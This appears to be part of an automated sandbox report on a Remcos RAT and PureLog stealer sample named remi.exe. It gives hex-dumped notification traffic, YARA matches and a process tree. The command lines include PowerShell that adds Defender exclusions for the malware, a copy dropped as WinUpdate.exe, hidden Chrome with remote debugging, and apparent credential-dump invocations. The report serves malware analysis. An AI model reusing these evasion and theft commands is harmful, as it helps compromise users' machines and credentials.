                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              41192.168.2.64982820.198.119.143443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:24:21 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 44 6a 4d 39 6e 51 34 52 70 45 65 74 66 73 59 37 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 63 33 39 64 37 32 64 35 37 62 34 34 32 64 36 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: DjM9nQ4RpEetfsY7.1Context: ac39d72d57b442d6
                                                                                                                                                                                                                                                                                              2024-11-28 06:24:21 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                              2024-11-28 06:24:21 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 44 6a 4d 39 6e 51 34 52 70 45 65 74 66 73 59 37 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 63 33 39 64 37 32 64 35 37 62 34 34 32 64 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 75 30 6e 7a 46 74 78 61 77 47 2b 62 4c 68 74 52 6e 32 41 44 6c 4a 49 46 78 41 51 66 73 49 6d 61 65 71 50 73 70 52 73 73 6e 72 71 71 61 2f 62 65 4e 5a 77 2f 75 5a 59 78 30 6d 59 6a 67 42 4a 4c 52 4b 35 76 46 77 57 4b 58 58 2f 57 2f 76 6d 6a 6f 56 39 39 32 49 6c 68 68 50 34 6f 37 6b 66 42 69 55 4f 73 76 57 57 55 32 77 31 2b
                                                                                                                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: DjM9nQ4RpEetfsY7.2Context: ac39d72d57b442d6<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXu0nzFtxawG+bLhtRn2ADlJIFxAQfsImaeqPspRssnrqqa/beNZw/uZYx0mYjgBJLRK5vFwWKXX/W/vmjoV992IlhhP4o7kfBiUOsvWWU2w1+
                                                                                                                                                                                                                                                                                              2024-11-28 06:24:21 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 44 6a 4d 39 6e 51 34 52 70 45 65 74 66 73 59 37 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 63 33 39 64 37 32 64 35 37 62 34 34 32 64 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: DjM9nQ4RpEetfsY7.3Context: ac39d72d57b442d6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                              2024-11-28 06:24:21 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                              2024-11-28 06:24:21 UTC58INData Raw: 4d 53 2d 43 56 3a 20 48 31 62 77 2b 49 7a 2f 45 6b 79 42 61 68 55 6c 4c 4b 49 79 58 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                              Data Ascii: MS-CV: H1bw+Iz/EkyBahUlLKIyXA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                              42192.168.2.64982920.198.119.143443
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-11-28 06:25:56 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 50 58 7a 55 69 2b 6a 70 55 55 36 53 72 57 47 6f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 63 31 30 36 66 63 61 37 64 37 34 34 66 38 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: PXzUi+jpUU6SrWGo.1Context: 2ac106fca7d744f8
                                                                                                                                                                                                                                                                                              2024-11-28 06:25:56 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                              2024-11-28 06:25:56 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 50 58 7a 55 69 2b 6a 70 55 55 36 53 72 57 47 6f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 63 31 30 36 66 63 61 37 64 37 34 34 66 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 75 30 6e 7a 46 74 78 61 77 47 2b 62 4c 68 74 52 6e 32 41 44 6c 4a 49 46 78 41 51 66 73 49 6d 61 65 71 50 73 70 52 73 73 6e 72 71 71 61 2f 62 65 4e 5a 77 2f 75 5a 59 78 30 6d 59 6a 67 42 4a 4c 52 4b 35 76 46 77 57 4b 58 58 2f 57 2f 76 6d 6a 6f 56 39 39 32 49 6c 68 68 50 34 6f 37 6b 66 42 69 55 4f 73 76 57 57 55 32 77 31 2b
                                                                                                                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: PXzUi+jpUU6SrWGo.2Context: 2ac106fca7d744f8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXu0nzFtxawG+bLhtRn2ADlJIFxAQfsImaeqPspRssnrqqa/beNZw/uZYx0mYjgBJLRK5vFwWKXX/W/vmjoV992IlhhP4o7kfBiUOsvWWU2w1+
                                                                                                                                                                                                                                                                                              2024-11-28 06:25:56 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 50 58 7a 55 69 2b 6a 70 55 55 36 53 72 57 47 6f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 63 31 30 36 66 63 61 37 64 37 34 34 66 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: PXzUi+jpUU6SrWGo.3Context: 2ac106fca7d744f8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                              2024-11-28 06:25:57 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                              2024-11-28 06:25:57 UTC58INData Raw: 4d 53 2d 43 56 3a 20 48 69 2f 53 4f 4d 33 4a 44 45 65 34 76 31 42 53 78 4d 38 79 59 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                              Data Ascii: MS-CV: Hi/SOM3JDEe4v1BSxM8yYA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                              Start time:01:22:00
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\remi.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\remi.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0xdd0000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2150371712.0000000007E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                                              Start time:01:22:01
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x980000
                                                                                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                                                              Start time:01:22:01
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\remi.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\remi.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x390000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                                                              Start time:01:22:01
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                                                              Start time:01:22:01
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\remi.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\remi.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0xd30000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                                                              Start time:01:22:02
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x170000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                                                              Start time:01:22:03
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x980000
                                                                                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                                                              Start time:01:22:03
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x440000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                                                              Start time:01:22:03
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                                                              Start time:01:22:03
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x5b0000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                                                              Start time:01:22:06
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff717f30000
                                                                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                                                              Start time:01:22:08
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                                              Start time:01:22:08
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\zkuwzgocnnacbxcaejqamgtb"
                                                                                                                                                                                                                                                                                              Imagebase:0x7e0000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                                              Start time:01:22:08
                                                                                                                                                                                                                                                                                              Start date:28/11/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\beapzzzejvshdeqenuduxtnkcfqj"
                                                                                                                                                                                                                                                                                              Imagebase:0x9a0000
                                                                                                                                                                                                                                                                                              File size:982'016 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:low
